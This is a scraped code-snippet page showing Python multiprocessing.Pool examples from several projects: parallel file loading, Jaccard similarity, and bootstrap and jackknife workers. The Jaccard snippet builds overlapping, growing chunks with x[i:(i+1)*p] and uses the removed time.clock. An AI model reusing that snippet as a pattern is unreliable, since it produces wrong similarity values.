    :param processes: The number of processes to use for loading the feature files.
    :param kwargs: Keyword arguments which will be sent to the load function.
    :return: A list of loaded feature data frames or numpy arrays.
    """
    logging.info("Reading files in parallel")
    pool = multiprocessing.Pool(processes)
    try:
        #Create a partial function with the keyword arguments set. This is done since the parallel map from
        # multiprocessing expects a function which takes a single argument.
        partial_load_and_pivot = partial(load_function, **kwargs)
        segment_frames = pool.map(partial_load_and_pivot, feature_files)
    finally:
        pool.close()
    return segment_frames

项目：Parallel-Processing-Nadig 作者：madhug-nadig | 项目源码 | 文件源码

def parallel_jaccard_similarity(self,x,y):

        p = 16
        pool = mp.Pool(processes= p)

        chunk_X = []
        chunk_Y = []

        for i in range(0, len(x), p):

            chunk_X.append(x[int(i):int((i+1)*p)])
            chunk_Y.append(y[int(i):int((i+1)*p)])

        s = time.clock()

        intersection_cardinality = sum(pool.starmap(self.interc_card_locl, zip(chunk_X,chunk_Y)))
        union_cardinality = sum(pool.starmap(self.union_card_locl, zip(chunk_X,chunk_Y)))
        print(intersection_cardinality, union_cardinality)
        e = time.clock()
        print("Parallel Jaccard Exec Time: ", e-s)
        return intersection_cardinality/float(union_cardinality)

项目：pylspm 作者：lseman | 项目源码 | 文件源码

def boot(self):
        p = Pool(self.cores)
        result = p.map(self.do_work, range(self.br))
        p.close()
        p.join()
        return result

项目：pylspm 作者：lseman | 项目源码 | 文件源码

def jk(self):
        p = Pool(self.cores)

        base = np.arange(0, len(self.data))
        self.indices = list(np.delete(base, i) for i in base)

        result = p.map(self.do_work_jk, range(self.br))
        p.close()
        p.join()
        return result